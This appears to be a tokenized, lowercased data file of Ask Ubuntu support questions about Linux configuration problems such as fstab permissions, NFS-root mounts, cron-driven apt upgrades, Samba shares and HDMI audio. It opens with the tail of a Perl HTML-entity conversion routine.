} /g ; # right curly brace s/\ & \ # 126\ ; /~/g ; # tilde s/\ & \ # 161\ ; /¡/g ; # inverted exclamation s/\ & \ # 162\ ; /¢/g ; # cent sign s/\ & \ # 163\ ; /£/g ; # pound sterling s/\ & \ # 164\ ; /¤/g ; # general currency sign s/\ & \ # 165\ ; /¥/g ; # yen sign s/\ & \ # 166\ ; /¦/g ; # broken vertical bar s/\ & \ # 167\ ; /§/g ; # section sign s/\ & \ # 168\ ; /¨/g ; # umlaut ( dieresis ) s/\ & \ # 169\ ; /©/g ; s/\ & copy\ ; /©/g ; # copyright s/\ & \ # 170\ ; /ª/g ; # feminine ordinal s/\ & \ # 171\ ; /«/g ; # left angle quote , guillemotleft s/\ & \ # 172\ ; /¬/g ; # not sign s/\ & \ # 174\ ; /®/g ; # registered trademark s/\ & \ # 175\ ; /¯/g ; # macron accent s/\ & \ # 176\ ; /°/g ; # degree sign s/\ & \ # 177\ ; /±/g ; # plus or minus s/\ & \ # 178\ ; /²/g ; # superscript two s/\ & \ # 179\ ; /³/g ; # superscript three s/\ & \ # 180\ ; /´/g ; # acute accent s/\ & \ # 181\ ; /µ/g ; # micro sign s/\ & \ # 182\ ; /¶/g ; # paragraph sign s/\ & \ # 183\ ; /·/g ; # middle dot s/\ & \ # 184\ ; /¸/g ; # cedilla s/\ & \ # 185\ ; /¹/g ; # superscript one s/\ & \ # 186\ ; /º/g ; # masculine ordinal s/\ & \ # 187\ ; /»/g ; # right angle quote , guillemotright s/\ & \ # 188\ ; /¼/g ; s/\ & frac14\ ; /¼/g ; # fraction one-fourth s/\ & \ # 189\ ; /½/g ; s/\ & frac12\ ; /½/g ; # fraction one-half s/\ & \ # 190\ ; /¾/g ; s/\ & frac34\ ; /¾/g ; # fraction three-fourths s/\ & \ # 191\ ; /¿/g ; # inverted question mark s/\ & \ # 192\ ; /à/g ; # capital a , grave accent s/\ & \ # 193\ ; /á/g ; # capital a , acute accent s/\ & \ # 194\ ; /â/g ; # capital a , circumflex accent s/\ & \ # 195\ ; /ã/g ; # capital a , tilde s/\ & \ # 196\ ; /ä/g ; # capital a , dieresis or umlaut mark s/\ & \ # 197\ ; /å/g ; # capital a , ring s/\ & \ # 198\ ; /æ/g ; # capital ae dipthong ( ligature ) s/\ & \ # 199\ ; /ç/g ; # capital c , cedilla s/\ & \ # 200\ ; /è/g ; # capital e , grave accent s/\ & \ # 201\ ; /é/g ; # capital e , acute accent s/\ & \ # 202\ ; /ê/g ; # capital e , circumflex accent s/\ & \ # 203\ ; /ë/g ; # capital e , dieresis or umlaut mark s/\ & \ # 204\ ; /ì/g ; # capital i , grave accent s/\ & \ # 205\ ; /í/g ; # capital i , acute accent s/\ & \ # 206\ ; /î/g ; # capital i , circumflex accent s/\ & \ # 207\ ; /ï/g ; # capital i , dieresis or umlaut mark s/\ & \ # 208\ ; /ð/g ; # capital eth , icelandic s/\ & \ # 209\ ; /ñ/g ; # capital n , tilde s/\ & \ # 210\ ; /ò/g ; # capital o , grave accent s/\ & \ # 211\ ; /ó/g ; # capital o , acute accent s/\ & \ # 212\ ; /ô/g ; # capital o , circumflex accent s/\ & \ # 213\ ; /õ/g ; # capital o , tilde s/\ & \ # 214\ ; /ö/g ; # capital o , dieresis or umlaut mark s/\ & \ # 215\ ; /×/g ; # multiply sign s/\ & \ # 216\ ; /ø/g ; # capital o , slash s/\ & \ # 217\ ; /ù/g ; # capital u , grave accent s/\ & \ # 218\ ; /ú/g ; # capital u , acute accent s/\ & \ # 219\ ; /û/g ; # capital u , circumflex accent s/\ & \ # 220\ ; /ü/g ; # capital u , dieresis or umlaut mark s/\ & \ # 221\ ; /ý/g ; # capital y , acute accent s/\ & \ # 222\ ; /þ/g ; # capital thorn , icelandic s/\ & \ # 223\ ; /ß/g ; # small sharp s , german ( sz ligature ) s/\ & \ # 224\ ; /à/g ; # small a , grave accent s/\ & \ # 225\ ; /á/g ; # small a , acute accent s/\ & \ # 226\ ; /â/g ; # small a , circumflex accent s/\ & \ # 227\ ; /ã/g ; # small a , tilde s/\ & \ # 228\ ; /ä/g ; # small a , dieresis or umlaut mark s/\ & \ # 229\ ; /å/g ; # small a , ring s/\ & \ # 230\ ; /æ/g ; # small ae dipthong ( ligature ) s/\ & \ # 231\ ; /ç/g ; # small c , cedilla s/\ & \ # 232\ ; /è/g ; # small e , grave accent s/\ & \ # 233\ ; /é/g ; # small e , acute accent s/\ & \ # 234\ ; /ê/g ; # small e , circumflex accent s/\ & \ # 235\ ; /ë/g ; # small e , dieresis or umlaut mark s/\ & \ # 236\ ; /ì/g ; # small i , grave accent s/\ & \ # 237\ ; /í/g ; # small i , acute accent s/\ & \ # 238\ ; /î/g ; # small i , circumflex accent s/\ & \ # 239\ ; /ï/g ; # small i , dieresis or umlaut mark s/\ & \ # 240\ ; /ð/g ; # small eth , icelandic s/\ & \ # 241\ ; /ñ/g ; # small n , tilde s/\ & \ # 242\ ; /ò/g ; # small o , grave accent s/\ & \ # 243\ ; /ó/g ; # small o , acute accent s/\ & \ # 244\ ; /ô/g ; # small o , circumflex accent s/\ & \ # 245\ ; /õ/g ; # small o , tilde s/\ & \ # 246\ ; /ö/g ; # small o , dieresis or umlaut mark s/\ & \ # 247\ ; /÷/g ; # division sign s/\ & \ # 248\ ; /ø/g ; # small o , slash s/\ & \ # 249\ ; /ù/g ; # small u , grave accent s/\ & \ # 250\ ; /ú/g ; # small u , acute accent s/\ & \ # 251\ ; /û/g ; # small u , circumflex accent s/\ & \ # 252\ ; /ü/g ; # small u , dieresis or umlaut mark s/\ & \ # 253\ ; /ý/g ; # small y , acute accent s/\ & \ # 254\ ; /þ/g ; # small thorn , icelandic s/\ & \ # 255\ ; /ÿ/g ; # small y , dieresis or umlaut mark s/^\s+// ; return $ _ ; } after making ward 's changes :
23757	how do i turn on 'shutdown logging ' or operating system tracing ?	i have a simple question : how do i turn on logging of the shutdown sequence and x-server , which both keep failing ; shutdown that does n't shut it down , xserver that crashes . i would like to create the equivalent of a windows memory dump , the windows event viewer 's system-bucket and a crash-dump on sigterm for xserver . regards
23759	how to set individual ntfs partitions permissions behaviour for each user account ?	i have two ntfs partitions ( downloads for downloaded files and vm for my virtualbox .vdi file ) for which i must have full permissions for my allday use account . they should be also automounting when i login to this account . but i 've also set guest account for guests . for guest account , i want make vm partition fully disabled and invisible ( and thus it must n't automount ) but downloads partition should be shared with limited privileges with guest account . editing fstab i 'm able to share downloads partition with guest on limited privileges but vm can be only set to limited and have disabled automounting - so guest ca n't mount it but it still can be seen in nautilus , plus i must always mount it manually when i login to allday account . is there some trick to make what i want ? here 's my fstab config : # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # entry for /dev/sda1 : uuid=35e66658-5ee9-40cf-bf56-8204959e3df0 / xfs defaults 01 # entry for /dev/sda2 : uuid=26c714cf-4236-45e7-9c46-cfcf91a215ae /home xfs defaults 02 # entry for /dev/sda5 : uuid=1315bcb027c44639 /media/downloads ntfs-3g auto , uid=1000 , gid=1000 , umask=0022 , nodev , locale=pl_pl.utf8 0 0 # entry for /dev/sda6 : uuid=60ff39eb72b72264 /media/vm ntfs noauto , uid=1000 , gid=1000 , umask=0077 , nodev , locale=pl_pl.utf8 0 0 # entry for /dev/sda7 : uuid=c52411f5-105c-45d1-971f-412f962c350e none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 thanks
23762	how to disable touchpad click on acer aspire 5742z	i have an acer aspire 5742z using ubuntu operating system - how do i disable the touch-pad click
23767	using the fsc mount option with nfsroot kernel parameter to allow fs-cache	i 'm pxe-booting a ubuntu 10.10 system , where i specify the kernel parameters as follows : append root=/dev/nfs initrd=ubuntu-boot/initrd.img-2.6.35-24-generic nfsroot=11.22.33.44 : /data/nfsroot , fsc ip=dhcp rw i need to use the mount option 'fsc ' in order to use fs-cache functionality ( the cachefilesd package . ) however , when i try this i get the following error upon boot : nfsmount : bad option 'fsc' why does n't nfsmount permit this option ? ( it works fine when you mount manually with mount -o fsc after booting up . ) i changed nfsmount to mount -t nfs in the file /usr/share/initramfs-tools/scripts/nfs and then i ran update-initramfs -u to update the initramfs image , but it seems this still gives an error : mount : unknown nfs mount option 'fsc' my guess would be that this is a limitation of the mount functionality in klibc . what would be the best way to address this ? does the nfsmount program need to be patched ? since this seems to be a limitation of the nfsmount tool in klibc , i was thinking that i could add /sbin/mount.nfs to the initramfs image and mount the nfsroot with this tool instead . i copied it into the folder /usr/lib/klibc/bin and i updated the script /usr/share/initramfs-tools/scripts/nfs as follows : mount.nfs $ { nfsroot } $ { rootmnt } -o nolock $ { roflag } $ { nfsopts } after booting the updated initramfs image , there is a long delay when mount.nfs is executed and then the following message is displayed : mount.nfs : an incorrect mount option was specified begin : retrying nfs mount ... begin : running /scripts/nfs-premount ... done . however , this message is displayed no matter what mount options i use , so it appears to be a different problem altogether ...
23770	how to remove a package from the list of packages to be installed in apt-get ?	after i tried installing vim using apt-get install , apt-get keeps giving me a segmentation fault while trying to install vim-runtime . i 'm pretty sure it 's just with that one specific package , and whenever i try to do apt-get install to install any other package , vim-runtime is in the list of packages that will be installed , and it 's always the first package that tries to install , so i ca n't install any other packages . how can i remove vim-runtime from the list of packages that will be installed ? it always shows up even if it is not a dependency of a package i want to install . note : this is on an ubuntu rootfs running on arm .
23776	is it possible to store documents in ubuntu one and edit them online ?	microsoft office web apps has skydrive ; google docs also has storage . is it possible to store documents in ubuntu one and edit them online from there ?
23777	are there plans to use the empty space in the soundmenu ?	there seems to be roughly 4 lines of space next to the album art . however only 3 are used . song title artist album if nothing is planned for the 4th line . i propose that it is used for track time/length . this way you can tell how far along a song is without the need of a scrub bar . unrelated , but i feel that the play-lists section should display how many songs are in that play list . some of my play lists have no songs , and without realising this , it seems like a bug that the songs wont play .
23785	to same computer remote desktop thrue wrt54g router	to be sure connection is working i want to connect to same computer from same computer ive set up remote desktop . ca n't access from my same comp to same comp to test if all is ok . tried all mentioned posibilities . tryd my ip xxx.xxx.xxx.xxx / localhost with / without :5900 added with / without in `` remote desktop '' checked `` configure network automatically to accept connection '' with / without in router wrt54g enabled port 5900 forwardet to my comp 192.168.1.3 upnp is enabled . i can connect to one other comp whitch is n't using router and checked `` configure network automatically to accept connection '' and to one through tenda w311r+ router where i 've put port forwarding to 5900 and there works xxx.xxx.xxx.xxx:5900 what 's wrong ? what have i missed ?
23788	youtube plugin in totem first loads and then plays the video ?	in totem the youtube plugin first loads all the video , taking a lot of time for a video of 5 minutes . only when all the video is loaded it starts playing it . is this normal ?
23790	how to build and compile a bzr branch for testing	when i pull down a bzr branch using bzr branch lp : ubuntu/ < package name > i get one set of source files . however , when i go apt-get source < package name > i get another . the command debuild will not work on the first , but it will on the second , and this is the recommended way of building packages from source on ubuntu , and i think debian as well ( see this question ) . if i want to submit a patch to ubuntu , the easiest way is us bzr to branch the code and then push it back out once i 'm done , something that obviously wo n't work with the apt-get source method since the list of downloaded files are different . how am i supposed to pull source code down , test a patch , then push it back out ? right now , it seems like i have to test the changes using the apt-get source method before pulling down a branch with bar branch and completely redoing the changes there .
23795	why does apt-get fail when automated with cron ?	i 'm trying to use cron to automate my system updates . you can see my crontab , commands , and resulting errors below . when i run upgrades.sh as root , the script runs fine . when cron runs it , apt-get -y update runs no problem , but aptitude -y safe-upgrade fails . i 'm guessing this error : debconf : ( this frontend requires a controlling tty . ) is because there is a kernel update which in turn updates grub , which requires my explicitly saying it 's okay to overwrite /boot/grub/menu.lst . but i do n't understand the path errors . and i 'd like the updates that do n't require my supervision to go through . i have read through this question and it 's as yet unaccepted solution of unattended-upgrades , and i may end up using it , but why ca n't i use cron ? seems like it should be really simple , and more linuxy . crontab root @ daedalus : ~/bin # crontab -l # m h dom mon dow command 45 06 * * * ~/bin/upgrades.sh upgrades.sh root @ daedalus : ~/bin # cat upgrades.sh # ! /bin/bash /usr/bin/apt-get -y update /usr/bin/aptitude -y safe-upgrade errors debconf : unable to initialize frontend : dialog debconf : ( term is not set , so the dialog frontend is not usable . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( this frontend requires a controlling tty . ) debconf : falling back to frontend : teletype dpkg-preconfigure : unable to re-open stdin : fetched 37.6mb in 4min 23s ( 143kb/s ) dpkg : warning : 'ldconfig ' not found on path . dpkg : warning : 'start-stop-daemon ' not found on path . dpkg : warning : 'update-rc.d ' not found on path . dpkg : 3 expected program ( s ) not found on path . nb : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 ) a package failed to install . trying to recover : dpkg : warning : 'ldconfig ' not found on path . dpkg : warning : 'start-stop-daemon ' not found on path . dpkg : warning : 'update-rc.d ' not found on path . dpkg : 3 expected program ( s ) not found on path . nb : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . reading package lists ... building dependency tree ... reading state information ... reading extended state information ... initializing package states ... writing extended state information ...
23796	add entries to nautilus ' right-click menu ( copy , move to arbitrary directories )	assume i want to copy a file from /home/foo/bar/baz to /opt/quuz/dir1/option3 . when i try it with nautilus , first i have to open the correct directory , copy the file , go to the other directory and paste it there . i was thinking of a better way and old kde3 versions of konqueror came to mind . it was possible to right-click on a file . the context menu had an option for copying , moving the file to some default directories . furthermore you could select any directory under / . so for the above action one would right click on a file , select /opt first , a list of subdirectories will open , select /opt/quuz and so on . using gnome there are only two possible values ( home and desktop ) . is there any way to insert more directories to this context menu in gnome ? can i copy somehow the behaviour of konqueror ?
23800	wubi gives kernel missing error after update	i recently decided to scrap my wubi install of ubuntu 10.0.4 . instead of doing an update , i just uninstalled it through my windows , and downloaded the 10.10 version . now , when it boots , it gives me this error : you need to load the kernel first . failed to boot both default and fallback entries . i have n't used *nix tinkering in a while . anyone have any ideas ?
23806	istat menu 3 of mac equivalent ?	with mac , i have istat that shows computer info ( memory/cpu/network ... ) in real time . does ubuntu has similar application ?
23808	what is the double slash ( // ) directory ?	i mistakenly typed cd // instead of cd / . to my surprise , current directory showed up as // . what is that directory ? why does it exist ? apple @ snipped $ pwd /home/apple apple @ snipped $ cd / apple @ snipped $ pwd / apple @ snipped $ cd // apple @ snipped $ pwd // apple @ snipped $ cd /// apple @ snipped $ pwd /
23810	how to create a user group that can only use one application ?	i need create a special user group which is only allowed to login in to gnome and execute only one application . how can i do that ?
23816	how to make/use launcher ?	in ubuntu , i can run firefox with the command firefox in terminal , or click the button in dock or panel . how does this possible with ubuntu ? i googled to find the name launcher , but i do n't know exactly how does it work . q1 : how to make launcher ? if i make a gui program , does that mean that i need to create launcher to start by clicking it ? q2 : can i make a launcher for whatever program , even if it 's not a gui program ? q3 : how to link a launcher ? how can make a link to a launcher in a desktop to start a program ? q4 : the idea of launcher is unique to ubuntu ? or if i have one launcher , can i use it for other distributions ? q5 : why some of the program pops up its icon in docky ( firefox for example ) , but some of the program does n't ( p4v for example ) ?
23817	fixing grub2 vista problem	i installed ubuntu 10.10 and found that the grub menu was showing windows vista for recovery mode and vice-versa . how can i fix this error ?
23818	is linux binary universal to all kinds of distributions ?	i happen to install model sim vhdl simulator on linux . the manual says it only supports redhat or suse , but i just tried to install it on ubuntu . and , i could install it without any problem . is linux binary universal to all kinds of distribution ? i mean , if i make a program on distrubution a , can i be sure it will run on any linux ? why most of the commercial program vendor says the program is running on specific distribution ? ( mostly redhat and suse , not ubuntu )
23820	i switched to a debian desktop , how can i download my notes from ubuntu one acct ?	i have tomboy notes on my debian desktop . i would like to download my backed up notes at my ubuntu one acct . i can login , but do n't know how to download all my notes ( about 80 ) i do n't need to make ubuntu one run on debian , i just need to make tomboy download and also sync with my ubuntu one account . can it be done ? i appreciate any help or advice you can share . thank you
23829	where can i get the latest version of totem ?	i would like to install the latest version of totem . i want to use a ppa or a .deb and i could n't find anything on the web .
23830	windows 7 ca n't boot with ubuntu on different hard drive	i use a dual boot with two hard disks and two os is ubuntu 10.04 and windows 7 . windows 7 installed on the first disk , first partition . grub is installed on a second hard disk mbr , and ubuntu installed on an extended partition on a second hard drive . when i select windows 7 on the grub menu , the hdd lamp lights up briefly and then black screen on the monitor , with the status of the keyboard is still functioning . until now ( with the default boot from first hdd ) , i have to press f12 to get into the grub to run linux on a second hdd . output of fdisk -l grub.cfg . i want to retain grub to remain on the second hdd , and windows 7 could choose from the menu provided by grub . but i do not get how , i hope anyone can help .
23836	is it possible to customize/configure ubuntu to have vim-like features ?	after using vim for few years a realised that i can do this faster without the mouse . is it possible to customise/configure ubuntu to have vim-like features ?
23839	failed to download package	i tried to install updates from the update manager but it always displays an error message failed to download package file and the details is : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_3.10.6-1ubuntu10.2_all.deb the http server sent an invalid content-range header [ ip : 91.189.92.167 80 ] please can someone help me out . thanks for your response ...
23847	how to download apps from different os to usb and then transfer to ubuntu ?	i just installed ubuntu on my old desktop computer , and i have to sayâi freaking love it ! except at the moment i do not have internet connection ( i 'm using a unsecured connection ) and i 'm using my windows 7 laptop to get a connection to the web . i would love to install some useful apps on the desktop , but i ca n't figure out how to do this , is there any way to download ubuntu/linux apps on my windows computer and put them into a usb then transfer to the desktop ?
23848	how to setup glassfish v3 ?	there is no package name glassfish or something else related to glassfish.i have to download it to local and unpack the file , but i do n't know what to do next , how to start it at startup . thanks for your help
23852	failure to install software from software center	i have recently installed ubuntu version 10.10 but i can not install any software from the software center .
23853	does a hdd run more in ubuntu ?	this is something that 's been bothering me , and i would like to know if it 's an issue that 's known . ok , i have monitored the hdd temperature , for a couple of days , when running in ubuntu and windows 7 . i have both os installed on the same laptop , and i 'm using speedfan to monitor the hdd temp in windows 7 , and hddtemp to monitor on ubuntu . when running on windows 7 the hdd usually stay around 37-39 . this is on the load of when just web browsing , watch movies , and programming . and when i do the same thing on ubuntu the hdd will go to 40-42 . most of the time however it stay 41-42 degree . btw , even when just idling in ubuntu the hdd will go over 40 degrees . this is n't a really big issue maybe since i read that hdd can handle temperature to at least 60 degree . however since the hdd is located just where i put my right palm , so it is quite disturbing at some times . is this temperature the same for you guys which are running ubuntu 10.10 on a laptop ?
23854	why is ssh-add adding duplicate identity keys ?	i have created a private/public ssh key pair using ssh-keygen . i use this to authenticate to remote servers . however , i find that when i log in , ssh-add -l already lists my identity key even though i have not added it ! if i use the command ssh-add it prompts me for my passphrase and loads my identity key . if i then list my keys with ssh-add -l , it now shows two identity keys ! these are obviously the same as both have the same fingerprint , but their descriptions are different ( the automatically loaded one is `` user @ host ( rsa ) '' and the one added using ssh-add is `` /home/user/.ssh/id_rsa ( rsa ) '' ) . so why does my identity key appear to be loaded without any action on my part , and why does ssh-add add the same key again ? obviously something must be doing this automatically , but what is it , and how can i stop it ?
23856	missing dependency when trying to install virtualbox	i wanted to install virtualbox-4.0 ( or any other version ) i went to system â administration â synaptic package manager then i marked virtualbox-4.0 for installation but i get this error : virtualbox-4.0 : depends : libqt4-opengl but it is not going to be installed what should i do ?
23857	ubuntu one contacts sync error	i have synced my contacts with ubuntu one , however , an error occurred , and i have instead of 300 contacts over 1700 contacts and all are messed up . how can i delete all contacts , and restart the sync process ? i tried deleting the contacts via evolution , but i can not see any of these 1700 contacts .
23859	ubuntu user credentials , file permissions	i am using ubuntu 10.10 for web development by using the symfony framework . normally i install ubuntu lamp ( turnkey edition ) , log in as root and configure all the necessary software in the server needed to work with symfony . ( samba , symfony etc.. ) the problem is when i am root the file permissions are not set right for the samba and symfony systems . all things i do/create in the terminal ( cli ) of ubuntu create file permissions for the user root . off course i know how to change them afterwards but that takes up time i could spend programming . when ready i am using the box via my network , creating several site directories directly from my pc on the server . there are multiple sites on this developer server as directories under /var/www/ there are no virtual hosts . my question is how to create or set a user after installation of ubuntu with the right credentials and rights ?
23860	how do i list samba user accounts that need synchronizing ?	from searching , i have found a lot of suggestions for synchronizing the unix account and the samba account using smbpasswd , but how do i tell which accounts need synchronizing , and which accounts are already synchronized ? if i can not get this information , is it at least possible to get a list of those user accounts that have a samba password set ?
23864	how can i automatically mount esata drives when plugged in ?	what can i do to make ubuntu automatically mount an external drive when it is connected to an esata port ? currently i must go to home folder ▸ go ▸ computer and click on the disk to mount it .
23869	could not apply the stored configuration for the monitor	i 'm using nvidia 7300 gt and monitor-acer v173w , on 64 bit ubuntu 10.04 . compiz and emerald went well , but at the time of entry into the gui , i always receive the message : '' could not apply the stored configuration for the monitor , could not find a suitable configuration of screens '' why do i always receive it , and what is wrong with the monitor configuration or pci-e is used ? root @ dellph1-desktop : / # xrandr screen 0 : minimum 320 x 240 , current 1440 x 900 , maximum 1440 x 900 default connected 1440x900+0+0 0mm x 0mm 1440x900 50.0* 1024x768 51.0 58.0 59.0 1360x768 52.0 53.0 1152x864 54.0 55.0 56.0 57.0 960x600 60.0 960x540 61.0 896x672 62.0 840x525 63.0 64.0 65.0 66.0 832x624 67.0 800x600 68.0 69.0 70.0 71.0 72.0 73.0 800x512 74.0 720x450 75.0 680x384 76.0 77.0 640x512 78.0 79.0 640x480 80.0 81.0 82.0 83.0 576x432 84.0 85.0 86.0 87.0 512x384 88.0 89.0 90.0 416x312 91.0 400x300 92.0 93.0 94.0 95.0 320x240 96.0 97.0 98.0 root @ dellph1-desktop : / # === xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 260.19.29 ( buildmeister @ swio-display-x86-rhel47-04.nvidia.com ) wed dec 8 12:27:27 pst 2010 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : xconfig , vertrefresh source : xconfig identifier `` monitor0 '' vendorname `` unknown '' modelname `` acer v173w '' horizsync 30.0 - 83.0 vertrefresh 55.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 7300 gt '' endsection section `` screen '' # removed option `` metamodes '' `` 1440x900_60 +0+0 ; 1280x1024 +0+0 '' # removed option `` metamodes '' `` 1440x900 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` 1440x900_75 +0+0 ; 1440x900 +0+0 '' subsection `` display '' depth 24 endsubsection endsection
23870	how do i see all of the directories shared using nautilus sharing options ?	when you share a directory using samba , you can do this system-wide by editing the /etc/samba/smb.conf file ( the advanced way ) or by right-clicking a directory using nautilus and selecting 'sharing options ' ( the easy way ) . however , while i can see what directories are shared system-wide by looking at /etc/samba/smb.conf , if i share directories using nautilus , i do not know what directories that i ( or other users ) have shared . so how do i list all the directories that have been shared by samba using nautilus sharing options for all the users on a system ?
23871	no hdmi audio with geforce 9600gt and nforce board	i 've been trying to get hdmi with sound working for the last few days , and i 'm a little bit out of ideas . ( i 've verified that the hardware/setup works via windows . ) aplay does not list my hdmi device : $ aplay -l **** list of playback hardware devices **** card 0 : nvidia [ hda nvidia ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 1 : alc662 rev1 digital [ alc662 rev1 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i 've already compiled the alsa drivers ( 1.0.24 ) from a snapshot ( with -- with-oss=no ) and added the line options snd-hda-intel model=auto # tried 3stack-dig and 6stack-dig too to /etc/modprobe.d/alsa-base.conf . still , the device does not show up . if it is important , the hdmi tv is at the moment not configured to be part of the x session ( i 've tried that to , at least with x restart , and it did n't change anything ) . what did i miss ? $ lspci 00:00.0 host bridge : nvidia corporation device 07c3 ( rev a2 ) 00:00.1 ram memory : nvidia corporation nforce 630i memory controller ( rev a2 ) 00:01.0 ram memory : nvidia corporation nforce 630i memory controller ( rev a1 ) 00:01.1 ram memory : nvidia corporation nforce 630i memory controller ( rev a1 ) 00:01.2 ram memory : nvidia corporation nforce 630i memory controller ( rev a1 ) 00:01.3 ram memory : nvidia corporation nforce 630i memory controller ( rev a1 ) 00:01.4 ram memory : nvidia corporation nforce 630i memory controller ( rev a1 ) 00:01.5 ram memory : nvidia corporation nforce 630i memory controller ( rev a1 ) 00:01.6 ram memory : nvidia corporation nforce 630i memory controller ( rev a1 ) 00:02.0 ram memory : nvidia corporation nforce 630i memory controller ( rev a1 ) 00:03.0 isa bridge : nvidia corporation mcp73 lpc bridge ( rev a2 ) 00:03.1 smbus : nvidia corporation mcp73 smbus ( rev a1 ) 00:03.2 ram memory : nvidia corporation mcp73 memory controller ( rev a1 ) 00:03.4 ram memory : nvidia corporation mcp73 memory controller ( rev a1 ) 00:04.0 usb controller : nvidia corporation geforce 7100/nforce 630i usb ( rev a1 ) 00:04.1 usb controller : nvidia corporation mcp73 [ nforce 630i ] usb 2.0 controller ( ehci ) ( rev a1 ) 00:08.0 ide interface : nvidia corporation mcp73 ide ( rev a1 ) 00:09.0 audio device : nvidia corporation mcp73 high definition audio ( rev a1 ) 00:0a.0 pci bridge : nvidia corporation mcp73 pci express bridge ( rev a1 ) 00:0b.0 pci bridge : nvidia corporation mcp73 pci express bridge ( rev a1 ) 00:0c.0 pci bridge : nvidia corporation mcp73 pci express bridge ( rev a1 ) 00:0d.0 pci bridge : nvidia corporation mcp73 pci express bridge ( rev a1 ) 00:0e.0 ide interface : nvidia corporation mcp73 ide ( rev a2 ) 00:0f.0 ethernet controller : nvidia corporation mcp73 ethernet ( rev a2 ) 02:00.0 vga compatible controller : nvidia corporation g94 [ geforce 9600 gt ] ( rev a1 ) $ aplay -l default pulse playback/recording through the pulseaudio sound server front : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog front speakers surround40 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 4.0 surround output to front and rear speakers surround41 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 5.0 surround output to front , center and rear speakers surround51 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=nvidia , dev=0 hda nvidia , alc662 rev1 digital iec958 ( s/pdif ) digital audio output dmix : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct sample mixing device dmix : card=nvidia , dev=1 hda nvidia , alc662 rev1 digital direct sample mixing device dsnoop : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct sample snooping device dsnoop : card=nvidia , dev=1 hda nvidia , alc662 rev1 digital direct sample snooping device hw : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog direct hardware device without any conversions hw : card=nvidia , dev=1 hda nvidia , alc662 rev1 digital direct hardware device without any conversions plughw : card=nvidia , dev=0 hda nvidia , alc662 rev1 analog hardware device with all software conversions plughw : card=nvidia , dev=1 hda nvidia , alc662 rev1 digital hardware device with all software conversions edit : in a forum thread i read that someone had problems with this chipset and kernel < = 2.6.36 , so i 'll try out natty and report back . edit2 : the card is still not recognized with natty ( 2.6.38 ) . current state : the current state is that it did not work all the way up into the 3.x kernels . quite some time ago i switched to a new nvidia card ( gt640 ) which works flawlessly . as i do n't intend to install the old card again , i 've closed this question as not reproducible anymore . if you have this problem , too , feel free to open a new question with your technical details .
23873	how can i schedule execution of a program ?	let 's say i have a small `` hello world '' java program compiled in my home directory . i can run it with java helloworld from my home directory and it executes without any problem . now i need to schedule to execute this program let 's say after 10mins from now . so , i am executing following commands on console : at now+10min warning : commands will be executed using /bin/sh at > java helloworld press ctrl+d to finish so it is scheduled properly as i can see it with at -l command . but at this time nothing happens . why ? what is wrong with it ? because , if instead of scheduling the execution my own program i schedule executing of gedit command it opens it at a specified time . but with my own program it does n't perform anything . how can i change the situation ?
23879	how to prevent gnome desktop from crashing ?	i have ubuntu 10.10 32bit running on my asus eeepc 1005px . i am experiencing frequent desktop crashes . when i turn on my netbook at least once in 5 times the defualt ubuntu theme disapears and the classic gnome theme appears . many times while doing some work , the desktop crashes and the cli gets shown , and after a few seconds the login screen appers . i am not using any widgets or dock bars , i just have a single gnome panel with default menus . the crashes also happen when using the default bundled ubuntu apps . is there any way to avoid these crashes ?
23885	will unity run well on my 9400gt ?	i 'd like to ask whether ubuntu will run better or worse with unity on my nvidia geforce 9400 gt . thank you .
23891	is it possible to configure apple 's magic mouse to be recognised on start up ?	this question may apply more roundly to all bluetooth mice but in my case i am dealing with an apple magic mouse . i have followed the set up instructions here ; https : //wiki.ubuntu.com/multitouch/applemagicmouse closely . i have even removed the mouse and started from scratch more than once repeating each step described carefully . every time the computer is started it does not see the magic mouse by default . i need to keep a wired mouse connected to the computer at all times which i use to log in with then connect the magic mouse , in a somewhat counter-intuitive exercise ! any help would be greatly appreciated . the following is an edit made to include responses to points made by others in response to my original question ; i believe i do use gdm as my understanding is it is default in ubuntu 10.10 . the only edit to the boot process i have made is this ; http : //www.omgubuntu.co.uk/2010/12/new-smooth-intelligent-plymouth-boot-screen-for-ubuntu/ i 'm no expert , i think perhaps plymouth loads after gnome display manager ? this plymouth theme is the only edit i 've made to the boot process so although i 'm not 100 percent certain as to what gnome display manager is , my login process is default apart from that . would gdm affect this issue , eg , should i 